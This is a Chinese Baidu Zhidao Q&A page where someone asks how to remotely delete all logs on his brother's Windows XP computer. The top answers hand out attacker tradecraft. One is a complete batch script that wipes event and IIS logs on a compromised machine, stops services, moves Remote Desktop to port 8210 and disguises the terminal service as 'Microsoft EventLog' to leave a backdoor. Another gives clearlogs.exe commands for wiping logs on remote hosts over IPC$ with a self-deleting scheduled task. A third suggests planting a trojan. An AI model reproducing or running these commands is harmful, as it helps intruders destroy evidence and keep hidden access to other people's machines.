怎样删除XP系统中的所有日志文件???

我能在我家把我在外地的弟弟的XP电脑中的日志文件给彻底删除掉么???是用远程!可以用程控制!谢谢!... 我能在我家把我在外地的弟弟的XP电脑中的日志文件给彻底删除掉么???
是用远程!
可以用程控制!
谢谢!
展开
 我来答
睿之魂
推荐于2016-09-20 · TA获得超过311个赞
知道小有建树答主
回答量:563
采纳率:0%
帮助的人:264万
展开全部
删除日志文件一般是黑客们惯用的打扫现场的做法~~这样别人就没办法知道他在这个电脑上都做了什么。一般的手动删除是没办法实现的,因为你毕竟是在连接对方PC的情况先删除的 最后还会留下你的一些信息,最好的办法就是写一个批处理文件 然后把这个文件放进对方电脑的“启动文件”里面 然后远程重新启动对方电脑,当对方电脑自动重新启动的时候就会自动运行这个批处理 这样对方电脑里面就不会残留你的任何信息!

你可以下载下面的这个程序自动完成

http://www.wishdown.com/Software/Catalog42/3177.html

或者使用下面批处理命令 把下面文字复制到一个文本里面 然后重新命名文本格式为批处理格式双吉运行即可

下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。

@regedit /s patch.dll

@net stop w3svc

@net stop event log

@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q

@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q

@del c:\winnt\system32\config\*.event /f /q

@del c:\winnt\system32dtclog\*.* /f /q

@del c:\winnt\*.txt /f /q

@del c:\winnt\*.log /f /q

@net start w3svc

@net start event log

@rem [删除日志]

@net stop lanmanserver /y

@net stop Schedule /y

@net stop RemoteRegistry /y

@del patch.dll

@echo The server has been patched,Have fun.

@del patch.bat

@REM [禁止一些危险的服务。]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll

@echo "PortNumber"=dword:00002010 >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll

@echo "PortNumber"=dword:00002012 >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll

@echo "Start"=dword:00000002 >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll

@echo "Start"=dword:00000002 >>patch.dll

@echo "ErrorControl"=dword:00000001 >>patch.dll

@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll

@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll

@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll

@echo "ObjectName"="LocalSystem" >>patch.dll

@echo "Type"=dword:00000010 >>patch.dll

@echo "Description"="Keep record of the program and windows message。" >>patch.dll

@echo "DisplayName"="Microsoft EventLog" >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll

@echo "Start"=dword:00000004 >>patch.dll

@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe

@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
开口大字典
2007-03-03 · TA获得超过5.9万个赞
知道大有可为答主
回答量:3万
采纳率:54%
帮助的人:1.1亿
展开全部
系统日志 通过手工很难清除. 这里介绍一个工具 clearlog.exe

使用方法:
Usage: clearlogs [\\computername] <-app / -sec / -sys>

-app = 应用程序日志
-sec = 安全日志
-sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名
** 然后开始清除: 方法
clearlogs \\ip -app 这个是清除远程计算机的应用程序日志
clearlogs \\ip -sec 这个是清除远程计算机的安全日志
clearlogs \\ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志
clearlogs -sec 这个是清除远程计算机的安全日志
clearlogs -sys 这个是清除远程计算机的系统罩?

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
例如建立一个 c.bat

rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果
第一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系统日志
第五行表示: 删除 clearlogs.exe 这个工具
第六行表示: 删除 c.bat 这个批处理文件
第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:\c.bat
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
百度网友a77cd727b
2007-03-03 · TA获得超过250个赞
知道小有建树答主
回答量:590
采纳率:0%
帮助的人:557万
展开全部
那要看你是想偷偷删还是公开删了!
偷偷删的话要在他电脑放个马才行;公开删最简单的就是用QQ的远程协助行了。删除的方法大致都差不多:右键‘我的电脑’——管理——系统日志——清空就可以了,然后再删除浏览器的临时文件。想简单一些也可以用例如超级兔子这样的软件
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
ysggt007
2007-03-03 · TA获得超过168个赞
知道小有建树答主
回答量:233
采纳率:0%
帮助的人:135万
展开全部
不用远程了,用软件自已清除就可以,用恶意软件清理助手 的临时清理就可以
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
默默离人行A
2007-03-03 · TA获得超过178个赞
知道答主
回答量:169
采纳率:0%
帮助的人:0
展开全部
和删你面前的机器一样 不过用远程控制就是了 网速有要求 慢的话 就不要召集 一点一点的来 卡
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
收起 更多回答(3)
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式